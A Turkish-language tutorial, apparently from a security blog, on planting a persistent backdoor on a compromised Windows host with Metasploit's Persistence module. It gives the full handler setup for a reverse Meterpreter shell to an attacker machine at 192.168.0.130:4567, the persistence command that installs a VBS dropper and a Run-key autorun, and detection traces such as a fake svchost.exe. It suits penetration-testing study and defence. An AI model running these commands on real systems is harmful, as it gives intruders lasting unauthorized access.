Furkan Sandal

Bir sisteme girildikten bir süre sonra bilgisayar ile bağlantı kesilebilmektedir. Bu durumda o bilgisayarı tekrar exploit etmek gerekebilir. Bunun yerine bilgisayar arka kapı da bırakılabilir. Bu yazıda, Metasploit Framework içerisindeki Persistence modülü kullanılarak arka kapı bırakılması incelenecektir.

Bir şekilde (bu örnek için MSF psexec modülü ile) Meterpreter kabuğuna düşülmüş bir bilgisayar aşağıdaki gibidir.

Bu bilgisayarda Persistence post modülü çalıştırılacak ve saldırgana ait Kali makinenin TCP 4567 portuna reverse bir meterpreter bağlantı kurması sağlanacaktır. Bu bağlantının Kali tarafından yakalanması için ayrı bir terminal açılarak exploit/multi/handler modülü başlatılır ve ayarları gerçekleştirilir.

Table of Contents

# msfconsole
# msf > use exploit/multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
# msf exploit(handler) > set ExitOnSession false
# msf exploit(handler) > set LHOST 192.168.0.130
# msf exploit(handler) > set LPORT 4567
# msf exploit(handler) > show options

Daha sonra da modül çalıştırılarak listener başlatılır.

# msf exploit(handler) > exploit -j

Daha önce açılan terminale (psexec modülü ile ilk exploit işleminin başlatıldığı terminal) geri dönülerek Persistence modülü çalıştırılır. Bu modül ile Kali makinenin TCP 4567. portuna meterpreter bağlantısı kurulması hedeflenmektedir.

meterpreter > run persistence -A -X -p 4567 -r 192.168.0.130

Not: Yukarıdaki modül çıktısında da görüldüğü gibi kurban makineye bir VBS (C:UsersTubitakAppDataLocalTempRVDJaFoFXmb.vbs) atılmış ve çalıştırılmıştır. Ayrıca bir Autorun (HKLMSoftwareMicrosoftWindowsCurrentVersionRunazgEziBW) da yüklenmiştir.

Bu modül yüklendiğinde, ikinci terminal üzerinde açık olan listener’a bir bağlantı talebi geldiği ve hedef sisteme payload gönderildiği (stage) görülmektedir. Bu payload ile de kurban makineye bağlantı kurulmuş olunur.

İlk terminale geri dönülüp bilgisayar yeniden başlatıldığında ilk terminaldeki bağlantı kopmaktadır:

Aynı zamanda ikinci terminaldeki bağlantı da kopmaktadır:

Bilgisayarın yeniden başlaması tamamlandığında ve oturum açıldığında, ikinci terminale yeniden bir talep gelmekte ve yeni bir stage gönderilmektedir. Böylece oturum açan kullanıcının haklarıyla tekrar bir oturum (Session 2) açılmaktadır:

Meterpreter bağlantısının prosesi incelendiğinde svchost.exe adlı bir proses olduğu görülmektedir. Ancak bu proses Windows’un standart prosesi olmadığı da görülmektedir. Bu proses ise, VBS çalıştıran bir Windows uygulaması (“wscript.exe”) tarafından oluşturulmuştur.

Bunun yanında kullanıcı bilgisayarı yeniden başlatmadan, oturumunu kapattığında (log off) listener bağlantısının (Session 2) da koptuğu görülmektedir. Ancak yeniden oturum açıldığında bağlantının yine oluştuğu (Session 3) görülmektedir.

Persistence modülü başlatıldığı zaman kurban bilgisayarına gönderilen VBS (…RVDJaFoFXmb.vbs) ve Autorun (…azgEziBW) değerleri, kurban bilgisayarındaki System Configuration (Run > Msconfig) penceresi incelendiğinde görülmektedir.